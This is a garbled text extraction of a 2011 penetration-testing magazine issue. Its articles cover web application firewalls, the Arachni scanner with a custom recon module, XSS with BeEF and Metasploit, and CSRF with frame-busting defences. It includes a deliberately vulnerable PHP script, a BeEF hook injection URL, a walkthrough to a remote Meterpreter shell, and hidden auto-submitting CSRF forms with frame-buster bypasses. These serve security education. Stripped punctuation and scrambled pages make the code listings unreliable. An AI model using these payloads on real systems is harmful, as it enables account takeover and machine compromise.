Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
Accept the installation of packages that are required to satisfy dependencies Note that some of your other tools might not work with these libraries or upgrades In any case an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand First we need to install libffi Execute the following commands in your Cygwin shell
$ cd
$ git clone httpgithubcomatgreenlibffigit
$ cd libffi
$ configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml Download the latest stable version of libyaml (currently 014) from http httppyyamlorgwikiLibYAML and move it to your Cygwin home folder (probably Ccygwinhomeyour _ windows _ id) Execute the following
$ cd
$ tar xvf yaml-014targz
$ cd yaml-014
$ configure
$ make
$ make install
Now we need to compile and install Ruby Download the latest stable release of Ruby (currently ruby-192-p290targz) from http httpwwwrubyorg and move it to your Cygwin home folder Execute the following commands in the Cygwin shell
$ cd
$ tar xvf ruby-192-p290targz
$ cd ruby-192-p290
$ configure
$ make
$ make install
From your Cygwin shell update and install some necessary modules
$ gem update ndashsystem
$ gem install rake-compiler
$ cd
$ git clone httpgithubcomdjberg96sys-proctablegit
$ cd sys-proctable
$ gem build sys-proctablegemspec
$ gem install sys-proctable-091-x86-cygwingem
Finally we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note these are the same commands as with the Linux installation) Listing 2
In case of weird error-messages (especially on Vista systems) regarding fork during compilation execute the following in your Cygwin shell
$ find usrlocal -iname lsquosorsquo gt tmplocalsolst
Quit all Cygwin shells Use Windows to browse to Ccygwinbin Right click ashexe and choose run as administrator Enter in ash
$ binrebaseall
$ binrebaseall -T tmplocalsolst
Exit ash
Light my FireHow to fire up Arachni depends on whether you want to use it with the new (since version 03) web GUI or simply run everything through the command-line interface Note that the current web GUI does not support all functionality that is available from the command-line
The GUI can be started by executing the following commands
$ arachni_rpcd amp
$ arachni_web
After that browse to httplocalhost4567 and admire the new GUI You will need to attach the GUI to one or more dispatchers The dispatcher(s) will run the actual scan
Figure 1 Edit Dispatchers
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
If you want to use the command-line interface just execute
$ arachni --help
A quick overview of the other screens (Figure 1)
bull Start a Scan start a scan by entering the URL and pressing Launch scan After a scan is launched the screen gives an overview of what issues are detected and how far the process is
bull Modules enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site-Scripting (XSS) SQL Injection (SQLi) Cross-Site-Request Forgery (CSRF) or detect hidden features or simply make lists of interesting items such as email addresses
bull Plugins plug-ins help to automate tasks Plug-ins are more powerful than modules and enable to script login sequences detect Web Application Firewalls (WAF) perform dictionary attacks hellip
bull Settings the settings screens allows to add cookies and headers limit the scan to certain directories hellip
bull Reports gives access to the scan reports Arachni creates reports in its own internal format and exports them to HTML XML or text
bull Add-ons three add-ons are installedbull Auto-deploy converts any SSH enabled Linux
box in an Arachni dispatcherbull Tutorial serves as an examplebull Scheduler schedules and run scan jobs at a
specific timebull Log overview of actions taken by the GUI
Your First ScanWe will use both the command-line and the GUI First the command-line start a scan with all modules active This is extremely easy
$ arachni httpwwwexamplecom --report =afroutfile=
wwwexamplecomafr
Afterwards the HTML report can be created by executing the following
$ arachni --repload=wwwexamplecomafr --report=html
outfile=wwwexamplecomhtml
Thatrsquos it Enabling or disabling modules is of course possible Execute the following command for more information about the possibilities of the command-line interface
$ arachni --help
Usually it is not necessary to include all recon modules Some modules will create a lot of requests making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish List all modules with the following command
$ arachni --lsmod
Enabling or disabling modules is easy use the --mods switch followed by a regular expression to include modules or exclude modules by prefixing the regular expression with a dash Example
$ arachni --mods= -xss_ httpwwwexamplecom
The above will load all modules except the module related with Cross-Site-Scripting (XSS)
Using the GUI makes this process even easier Open the GUI by browsing to httplocalhost4567 and accept the default dispatcher
Next steps are to verify the settings in the Settings Modules and Plugins screens Once you are satisfied proceed to the Start a Scan screen
If you want to run a scan against some test applications visit my blog for the list of deliberately vulnerable applications Most of these applications can be installed locally or can be attacked online (please read all related faqs and permissions before scanning a site In most jurisdictions this is illegal unless permission is explicitly granted by the owner)
After the scan just go the Reports screen and download the report in the format you wantFigure 2 Start a scan screen
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
Listing 3 Create your own module
=begin
Arachni
Copyright (c) 2010-2011 Tasos Zapotek Laskos
tasoslaskosgmailcom
This is free software you can copy and distribute
and modify
this program under the term of the GPL v20 License
(See LICENSE file for details)
=end
module Arachni
module Modules
Looks for common files on the server based on
wordlists generated from open
source repositories
More information about the SVNDigger wordlists
httpwwwmavitunasecuritycomblogsvn-digger-
better-lists-for-forced-browsing
The SVNDigger word lists were released under the GPL
v30 License
author Herman Stevens
see httpcwemitreorgdatadefinitions538html
class SvnDiggerDirs lt ArachniModuleBase
def initialize( page )
super( page )
end
def prepare
to keep track of the requests and not repeat them
__audited ||= Setnew
__directories ||=[]
return if __directoriesempty
read_file( all-dirstxt )
|file|
__directories ltlt file unless fileinclude( )
end
def run( )
path = get_path( pageurl )
return if __auditedinclude( path )
print_status( Scanning SVNDigger Dirs )
__directorieseach
|dirname|
url = path + dirname +
print_status( Checking for url )
log_remote_directory_if_exists( url )
|res|
print_ok( Found dirname at +
reseffective_url )
__audited ltlt path
def selfinfo
name =gt SVNDigger Dirs
description =gt qFinds directories
based on wordlists created from
open source repositories The
wordlist utilized by this module
will be vast and will add a consi
derable amount of
time to the overall scan time
author =gt Herman Stevens ltherman
stevensgmailcomgt
version =gt 01
references =gt
Mavituna Security =gt
httpwwwmavitunasecuritycom
blogsvn-digger-better-lists-for-
forced-browsing
OWASP Testing Guide =gt
httpswwwowasporgindexphp
Testing_for_Old_Backup_and_
Unreferenced_Files_(OWASP-CM-006)
targets =gt Generic =gt all
issue =gt
name =gt qA SVNDigger
directory was detected
description =gt q
tags =gt [ svndigger path
directory discovery ]
cwe =gt 538
severity =gt IssueSeverityINFORMATIONAL
cvssv2 =gt
remedy_guidance =gt Review these
resources manually Check if
unauthorized interfaces are exposed
or confidential information
remedy_code =gt
end
end
end
end
WEB APP VULNERABILITIES
Page 28 httppentestmagcom012011 (1) November
Create your Own ModuleArachni is very modular and can be easily extended In the following example we create a new reconnaissance module
Move into your Arachni source tree Yoursquoll find the modules directory In there yoursquoll find two directories audit and recon Move into the recon directory We will create our Ruby module
Arachni makes it real easy if your module needs external files it will search into a subdirectory with the same name Example if you create a svn_digger_dirsrb module this module is able to find external files in the modulesreconsvn_digger_dirs subdirectory
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing These wordlists are based on directories found in open source code repositories
If there is a directory that needed to be protected and you forget that it will be found by a scanner that uses these wordlists
Furthermore it can be used as a basis for reconnaissance if a directory or file is detected this might provide clues about what technology the site is using
Download the wordlists from the above URL Create a directory modulesreconsvn_digger_dirs and move the file all-dirstxt from the wordlist archive to the newly created directory
Create a copy of the file modulesreconcommon_
directoriesrb and name it svn_digger_dirsrb Change the code to read as follows Listing 3
The code does not need a lot of explanation it will check whether or not a specific directory exists if yes it will forward the name to the Arachni Trainer (who will include the directory in the further scans) as well as create a report entry for it
Note the above code as well as another module based on the SVNDigger wordlists with filenames are now part of the experimental Arachni code base
ConclusionWe used Arachni in many of our application vulnerability assessments The good points are
bull Highly scalable architecture just create more servers with dispatchers and share the load This makes the scanner a lot more responsive and fast
bull Highly extensible create your own modules plug-ins and even reports with ease
bull User-friendly start your scan in minutesbull Very good XSS and SQLi detection with very few
false positives There are false negatives but this
is usually caused by Arachni not detecting the links to be audited This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy
bull Excellent reporting capabilities with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE)
Arachni lacks support for the following
bull No AJAX and JSON supportbull No JavaScript support
This means that you need to help Arachni finding links hidden in JavaScript eg by using it as a proxy between your browser and the web application Yoursquoll need a different tool (or use your brain and manual tests) to check for AJAXJSON related vulnerabilities in the application you are testing
Arachni also cannot examine and decompile Flash components but a lot of tools are at hand to help you with that Arachni does not perform WAF (Web Application Firewall) evasion but then again this is not necessarily difficult to do manually for a skilled consultant or hacker
And why not write your own module or plug-in that implements the missing functionality Arachni is certainly a tool worth adding to your toolkit
HERMAN STEVENSAfter a career of 15 years spanning many roles (developer security product trainer information security consultant Payment Card Industry auditor application security consultant) Herman Stevens now works and lives in Singapore where he is the director of his company Astyran Pte Ltd (httpwwwastyrancom) Astyran specialises in application security such as penetration tests vulnerability assessments secure code reviews awareness training and security in the SDLC Contact Herman through email (hermanstevensgmailcom) or visit his blog (httpblogastyransg)
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
In most commercial penetration testing reports itrsquos sufficient to just show a small alert popup this is to show that a particular parameter is vulnerable to
an XSS attack However this is not how an attacker would function in the real world Sure hersquod use a pop up initially to find out which parameter is vulnerable to an XSS attack Once hersquos identified that though hersquoll look to steal information by executing malicious JavaScript or even gain total control of the userrsquos machine
In this article wersquoll look at how an attacker can gain complete control over a userrsquos browser ultimately taking over the userrsquos machine by using Beef (A browser exploitation framework)
A Simple POCTo start off though letrsquos do exactly what the attacker would do which is to identify a vulnerability For simplicityrsquos
sake wersquoll assume that the attacker has already identified a vulnerable parameter on a page Here are the relevant files which you too can use on your web server if you want to try this also
HTML Page
ltHTMLgt
ltBODYgt
ltFORM NAME=rdquotestrdquo action=rdquosearch1phprdquo method=rdquoGETrdquogt
Search ltINPUT TYPE=rdquotextrdquo name=rdquosearchrdquogtltINPUTgt
ltINPUT TYPE=rdquosubmitrdquo name=rdquoSubmitrdquo value=SubmitgtltINPUTgt
ltFORMgt
ltBODYgt
ltHTMLgt
XSS Beef Metaspoilt Exploitation
Figure 2 BeeF after conguration
Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victimrsquos browser The impact of an XSS attack is only limited by the potency of the attackerrsquos JavaScript code
Figure 1 User enters in a search box
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
and click a few buttons to configure it Alternatively you could use a distribution like Backtrack which already has BeeF installed Here is a screenshot of how BeeF looks after it is configured (Figure 2)
Instead of the user clicking on a link which will generate a popup box the user will instead be tricked to click on a link which tells his browser to connect to the BeeF controller The URL that the user has to click on is
httplocalhostsearch1phpsearch=ltscript src=
rsquohttp19216856101beefhookbeefmagicjsphprsquogt
ltscriptgtampSubmit=Submit
The IP address here is the one on which you have BeeF running Once the user clicks on the link above you should see an entry in the BeeF controller window showing that a Zombie has connected You can see this in the Log section on the right hand side or the Zombie section on the left hand side Here is a screenshot which shows that a browser has connected to the Beef controller (Figure 3)
Click and highlight the zombie in the left pane and then click on Standard Modules ndash Alert Dialog This will result in a little popup box popping up on the victim machine Herersquos a screenshot which shows the same (Figure 4) And this is what the victim will see (Figure 5)
So as you can see because of Beef even an unskilled attacker can run code which he does not even understand on the victimrsquos machine and steal sensitive data Hence it becomes all the more
Server Side PHP Code
ltphp
$a=$_GET[lsquosearchrsquo]
echo bdquoThe parameter passed is $ardquo
gt
As you can see itrsquos some very simple code where the user enters something in a search box on the first page his input is sent to the server which reads the value of the parameter and prints it on to the screen So instead of a simple text input the attack enters a simple JavaScript into the box the JavaScript will execute on the userrsquos machine and not get displayed The user hence has to just been tricked into clicking on a link httplocalhostsearch1phpsearch=ltscriptgtalert(documentdomain)ltscriptgt
The screenshot below clarifies the above steps (Figure 1)
Beef ndash Hook the userrsquos browserNow while this example is sufficient to prove that the site is vulnerable to XSS itrsquos most certainly not what an attacker will stop at An attacker will use a tool like BeeF (Browser Exploitation Framework) to gain more control of the userrsquos browser and machine
I used an older version of Beef(032) as I just wanted to demonstrate what you can do with such a tool The newer version has been rewritten completely and has many more features For now though extract Beef from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What attacer will see
Figure 5 What victim will see
Figure 6 Defacing the current Web Page
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
important to protect against XSS Wersquoll have a small section right at the end where I briefly tell you how to mitigate XSS
Irsquoll quickly discuss a few more examples using Beef before we move on to using it as a platform for other attacks Here are the screenshots for the same these are all a result of clicking on the various modules available under the Standard Modules menu
Defacing the Current Web PageThis results in the webpage being rewritten on the victim browser with the text in the lsquoDEFACE STRINGrsquo box Try it out (Figure 6)
Detect all Plugins on the Userrsquos BrowserThere are plenty of other plug-ins inside Beef under the Standard Modules and Browser modules tab which you can try out for yourself I wonrsquot discuss all of them here as the principle is the same What I want to do now though is use the userrsquos hooked Browser to take complete control of the userrsquos machine itself (Figure 7)
Integrate Beef with Metasploit and get a shellEdit Beefrsquos configuration files so that it can directly talk to Metasploit All I had to edit was msfphp to set the correct IP address Once this is done you can launch Metasploitrsquos browser based exploits from inside Beef
Figure 7 Detecting plugins on the user browser
Figure 8 startin Metaslpoit
Figure 9 bdquoJobsrdquo command
Figure 10 Metasploit after clicking bdquoSend Nowrdquo
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
Now first ensure that the Zombie is still connected Then click on Standard modules ndash Browser Exploit and configure the exploit as per the screenshot below Wersquore basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8)
Open a shell and run msfconsole to start metasploit Once you see the msfgt prompt click the zombie in the browser and click the Send Now button to send the exploit payload to the victim You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9)
If the victimrsquos browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance Herersquos what you see in Metasploit a while after you click Send Now (Figure 10)
Once yoursquove got a prompt yoursquore on that remote system and can do anything that you want with the privileges of that user Here are a few more screenshots of what you can do with Meterpreter The screenshots are self explanatory so I wonrsquot say much (Figure 11-13)
The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine At this point of time we have complete control over 1 machine
Once we have control over this machine we can use FTP or HTTP and download various other tools like Nmap Nessus a sniffer to capture all keystrokes on this machine or even another copy of Metasploit and install these on this machine We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network Eventually over a period of time it is potentially possible to compromise every machine on that network
MitigationTo mitigate XSS one must do the following
Figure 13 Meterpreter window - screenshot 3
bull Make a list of parameters whose values depend on user input and whose resultant values after they are processed by application code are reflected in the userrsquos browser
bull All such output as in a) must be encoded before displaying it to the user The OWASP XSS prevention cheatsheet is a good guide for the same
bull White List and Black list filtering can also be used to completely disallow specific characters in user input fields
ConclusionIn a nutshell we can conclude that if even a single parameter is vulnerable to XSS it can result in the complete compromise of that userrsquos machine If the XSS is persistent then the number of users that could potentially be in trouble increases So while XSS does involve some kind of user input like clicking a link or visiting a page it is still a high risk vulnerability and must be mitigated throughout every application
ARVIND DORAISWAMYArvind Doraiswamy is an Information Security Professional with 6 years of experience in SystemNetwork and Web Application Penetration testing In addition he freelances in information security audits trainings and product development [Perl Ruby on Rails] while spending a lot of time learning more about malware analysis and reverse engineering Email ndash arvinddoraiswamygmailcomLinked In ndash httpwwwlinkedincompubarvind-doraiswamy39b21332Other writings ndash httpresourcesinfosecinstitutecomauthorarvind AND httpardsecblogspotcom
Referencesbull httpwwwtechnicalinfonetpapersCSShtmlbull httpswwwowasporgindexphpCross-site_Scripting_
28XSS29bull httpswwwowasporgindexphpXSS_28Cross_Site_
Scripting29_Prevention_Cheat_Sheetbull httpbeefprojectcom
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
In simple words when an evil website posts a new status to your Twitter account while your Twitter login session is still active
Csrf BasicsA simple example of this is the following hidden HTML code inside the evilcom webpage
ltimg src=rdquohttptwittercomhomestatus=evilcomrdquo
style=rdquodisplaynonerdquogt
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request ForgeryIN-DEPTH ANALYSIS bull CYBER GATES bull 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1 HTML code used to bypass protection
ltdiv style=displaynonegt
ltiframe name=hiddenFramegtltiframegt
ltform name=Form action=httpsitecompostphp
target=hiddenFrame
method=POSTgt
ltinput type=text name=message value=I like
wwwevilcom gt
ltinput type=submit gt
ltformgt
ltscriptgtdocumentFormsubmit()ltscriptgt
ltdivgt
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
